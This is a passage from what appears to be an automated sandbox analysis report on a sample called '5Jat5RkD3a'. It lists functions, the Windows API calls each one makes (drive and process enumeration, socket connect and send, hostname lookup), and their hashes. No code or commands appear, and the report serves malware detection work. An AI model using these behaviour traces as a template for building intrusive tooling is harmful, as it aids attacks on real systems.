                                                              • GetLogicalDrives.KERNELBASE(?,?,0000008A), ref: 07010D77
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 59b48297db5f05d48ecec26933117dde0d72f6ace72cf7f89407f937eed7a87a
                                                              • Instruction ID: 72357a3c31b8d8062f0429d13367a085341fda5a4f6e000cd4f08534ac7aae01
                                                              • Opcode Fuzzy Hash: 59b48297db5f05d48ecec26933117dde0d72f6ace72cf7f89407f937eed7a87a
                                                              • Instruction Fuzzy Hash: 1521A1F621C214BEB201C6526B10AFE2BBCE7C2730F31C56BF4A6C5101E76489C98531
                                                              Function 002778B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: closesocket
                                                              • String ID: FD %s:%d sclose(%d)
                                                              • API String ID: 2781271927-3116021458
                                                              • Opcode ID: 899bee5c1c3e313d15cabc341f4b0f9109a8089058e0c2801428e5c644727470
                                                              • Instruction ID: b699b75953b184d6d904eb5f3ff33bca2872499979a6e7c47b7d0a60cd4924cc
                                                              • Opcode Fuzzy Hash: 899bee5c1c3e313d15cabc341f4b0f9109a8089058e0c2801428e5c644727470
                                                              • Instruction Fuzzy Hash: 18D0A7339192316B8530695ABC49C4F7BA8DDCAF60F064C58FD54B7301D1309C1087F2
                                                              Function 0033B060 Relevance: 3.0, APIs: 2, Instructions: 48networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0033B29E,?,00000000,?,?), ref: 0033B0BA
                                                              • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00323C41,00000000), ref: 0033B0C1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastconnect
                                                              • String ID:
                                                              • API String ID: 374722065-0
                                                              • Opcode ID: ce0adc30f87f8709779b31c2b8e6a6377d90cd378c49c52f9b92f8b8ef9ff1c5
                                                              • Instruction ID: c954dbf4142914630fb89b7740b0fb52a0ee0bc177c1914de348d23dacf2bb9c
                                                              • Opcode Fuzzy Hash: ce0adc30f87f8709779b31c2b8e6a6377d90cd378c49c52f9b92f8b8ef9ff1c5
                                                              • Instruction Fuzzy Hash: 0D01D8363042009BCA255A68CCC4E6BF399FF89364F050B64FA78971E1D726ED509751
                                                              Function 00324950 Relevance: 1.7, APIs: 1, Instructions: 170networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • gethostname.WS2_32(00000000,00000040), ref: 00324AA5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: gethostname
                                                              • String ID:
                                                              • API String ID: 144339138-0
                                                              • Opcode ID: 93cd64784a45e4f92347083d4d6b2a164e14f2cb53fb14205ac8236aec929978
                                                              • Instruction ID: 8662b8b265def08137c3a0d4d70e811eca97902e70744009070de240446c35d9
                                                              • Opcode Fuzzy Hash: 93cd64784a45e4f92347083d4d6b2a164e14f2cb53fb14205ac8236aec929978
                                                              • Instruction Fuzzy Hash: 0651F2B06047208BEB329B25FD4972376E4AF45715F15183CE98A8AAD1E775EC84CB42
                                                              Function 0706040D Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32FirstW.KERNEL32(000000AA,?,000000AA,?), ref: 07060417
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561723832.0000000007060000.00000040.00001000.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7060000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: 0077ce1a48bd13f7965de2cac1ccf669b787ac9839ad1c930a85bfd81494303e
                                                              • Instruction ID: 1b37b5740615017850da2ab1b931e1bc2da700f268d1b2e61566044815bb7153
                                                              • Opcode Fuzzy Hash: 0077ce1a48bd13f7965de2cac1ccf669b787ac9839ad1c930a85bfd81494303e
                                                              • Instruction Fuzzy Hash: 6E21A4E71EC222AD725294941B78DFF266EE5D7330B30872AB413C7646E6C44E465131
                                                              Function 07010C84 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,0000008A), ref: 07010D77
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 4de8bc77a097b45b4b0f8951cdd77fbf37d7d94cab824d601e5263f9696bf739
                                                              • Instruction ID: cd1e16ce0b2a1563210039c7087ccf5d1a47fcdf06a85cf0d94561ae924da2cf
                                                              • Opcode Fuzzy Hash: 4de8bc77a097b45b4b0f8951cdd77fbf37d7d94cab824d601e5263f9696bf739
                                                              • Instruction Fuzzy Hash: 8011D2F621C254EEB205C5526B10AFE2B6CEBC3730F35CA7BF4A6C6105D66499898531
                                                              Function 07010CB5 Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,0000008A), ref: 07010D77
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 6259dc5db7ade6f05470da402b9c096d94bb1ef971530a5e726ab9c6cc47d657
                                                              • Instruction ID: 6867eed94266180148841da75d4d2b7d587fbce7518d6be9edcb68a7043febd7
                                                              • Opcode Fuzzy Hash: 6259dc5db7ade6f05470da402b9c096d94bb1ef971530a5e726ab9c6cc47d657
                                                              • Instruction Fuzzy Hash: C211D6F621C250EEB202C6516A109FE2B7CEBC3630B31C66BF4E6C6105D66489C99632
                                                              Function 07010D6D Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2c34b133836f7252134c5ccd1a7e3df01e41696710488f9a5f08bce04819d033
                                                              • Instruction ID: 7af73bada21d5c1003f6cacb9f0147e0bf7abe54a07665710e967d8d46cf5472
                                                              • Opcode Fuzzy Hash: 2c34b133836f7252134c5ccd1a7e3df01e41696710488f9a5f08bce04819d033
                                                              • Instruction Fuzzy Hash: 7F2164B250D3C19ED70796705A545FA7FB4AEC321072A82EFE0E2CA117E218988DC332
                                                              Function 07010CD2 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,0000008A), ref: 07010D77
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: e093bc70270d71ac4e6f8f616ea71f11f52304ece5418a465f28d6c810bb3bbd
                                                              • Instruction ID: e7618954856a7425d56d96ff1b7b6f954697dd725e104c63f6d4002f4229cfe9
                                                              • Opcode Fuzzy Hash: e093bc70270d71ac4e6f8f616ea71f11f52304ece5418a465f28d6c810bb3bbd
                                                              • Instruction Fuzzy Hash: F901D6F661C214EEA245C652A6545FE3B78EBC3330B31856AF4E7C6101EB64D9898531
                                                              Function 07010CF3 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,0000008A), ref: 07010D77
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 7e551b80811e9fadc20026765bbd53f005f9806d9c8aa0c3713f8a7633ae2b1e
                                                              • Instruction ID: 9d671785ce8821d2a91749d1db528e0f30bd9f4579543b301f09a145594684f5
                                                              • Opcode Fuzzy Hash: 7e551b80811e9fadc20026765bbd53f005f9806d9c8aa0c3713f8a7633ae2b1e
                                                              • Instruction Fuzzy Hash: 6C0128F660C254EEA349CA5156509FE37ACFBD3320B30856EF4E3C6201D674DD898531
                                                              Function 07010CE1 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,0000008A), ref: 07010D77
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 8524ddcbec222bf7b42f2bdb5183af368b9e867bf6ca87b3634c7769f44b8b2c
                                                              • Instruction ID: 5c5178db107ffdc7fb2b2d3afdb816234a297d519669617d86f215f15da98424
                                                              • Opcode Fuzzy Hash: 8524ddcbec222bf7b42f2bdb5183af368b9e867bf6ca87b3634c7769f44b8b2c
                                                              • Instruction Fuzzy Hash: A501F9F261C214EEA246CA5156509FE3BA8EBC3630B31C56AF0E6C6101E664D9898531
                                                              Function 07010D2A Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,0000008A), ref: 07010D77
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 31e7ddbab0541d771338b1d47c9f508c809cf33eea612af0784ab562a8a58310
                                                              • Instruction ID: 9e9dac2a65c7f14c2a097e8f80aad774e45ddca09fa0db7b0cd664fbbedb3747
                                                              • Opcode Fuzzy Hash: 31e7ddbab0541d771338b1d47c9f508c809cf33eea612af0784ab562a8a58310
                                                              • Instruction Fuzzy Hash: 460142F660C394DFE345DA6065505FD3B78DBC3310B35856AF4D1CB105D6649889C271
                                                              Function 07010D23 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,0000008A), ref: 07010D77
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 99ee42a4491e7a8ba8dd639165eccd5f6e0bc90836a13fb41d9d1ab2682c0ab2
                                                              • Instruction ID: 02f8008860fcd7c88dc92b2ea0c74238d9b83503d979f467ab3f4caef174c501
                                                              • Opcode Fuzzy Hash: 99ee42a4491e7a8ba8dd639165eccd5f6e0bc90836a13fb41d9d1ab2682c0ab2
                                                              • Instruction Fuzzy Hash: E0F0A4F661C244EEA345CA6156509FE37B8EBD3620B31C9AEF4A3C6205E664988D8631
                                                              Function 07010D40 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,0000008A), ref: 07010D77
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 5661bc01ca9241b4573b4a6bb77ad6c9548d58a8aaed9bd4c2c65f58a2c0a983
                                                              • Instruction ID: 7dee074d0c43d95f5e725c96c6da0d34f5539351139f83da7bf2e8b0a7543721
                                                              • Opcode Fuzzy Hash: 5661bc01ca9241b4573b4a6bb77ad6c9548d58a8aaed9bd4c2c65f58a2c0a983
                                                              • Instruction Fuzzy Hash: 4601F9F260C680DFA349C661A6549FD3774EFC3220731C5BFE092CA115DA64998DC631
                                                              Function 0033AF70 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • getsockname.WS2_32(?,?,00000080), ref: 0033AFD1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID:
                                                              • API String ID: 3358416759-0
                                                              • Opcode ID: 5e640be061053cf796d16211c7b31431ffd2d0d5bc55c7be6bc1786f4e5ab415
                                                              • Instruction ID: 8e2779d7e29129573b48100c782e24b690a26e8aeb17b230b7b0311637eacf93
                                                              • Opcode Fuzzy Hash: 5e640be061053cf796d16211c7b31431ffd2d0d5bc55c7be6bc1786f4e5ab415
                                                              • Instruction Fuzzy Hash: A3119670808B85D5EB268F18D8427F6F3F8EFD0329F109618E5D942150F7365AC58BC2
                                                              Function 0033A920 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0033A97E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: send
                                                              • String ID:
                                                              • API String ID: 2809346765-0
                                                              • Opcode ID: 017d2c51bbc5c6af8ff4bfd0cafe867fd777b75738ace3c720574131a17204ed
                                                              • Instruction ID: b00ba674066977f06a174732bfca8e3c7749de1c11e56e092a57247b14fbabc5
                                                              • Opcode Fuzzy Hash: 017d2c51bbc5c6af8ff4bfd0cafe867fd777b75738ace3c720574131a17204ed
                                                              • Instruction Fuzzy Hash: B301A272B01B14AFC6148F25DC85B5AF7A5EF84720F068669FA982B361C331AC118BD1
                                                              Function 0033AF30 Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • socket.WS2_32(?,0033B280,00000000,-00000001,00000000,0033B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0033AF66
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: socket
                                                              • String ID:
                                                              • API String ID: 98920635-0
                                                              • Opcode ID: bf0b0742c134f9d91ea5e4593eb28910a98a8639ec3b8d998e4a829969a6c1f1
                                                              • Instruction ID: 15c9db279fa8b4003b4f97af9855ac4ab2fbdb0b6949ad2b1bdbc4e5574eb95c
                                                              • Opcode Fuzzy Hash: bf0b0742c134f9d91ea5e4593eb28910a98a8639ec3b8d998e4a829969a6c1f1
                                                              • Instruction Fuzzy Hash: AEE0EDB2A056216BD6659B58EC449ABF3A9EFC4B20F054A49BC9463214C330AC508BE2
                                                              Function 0033B020 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
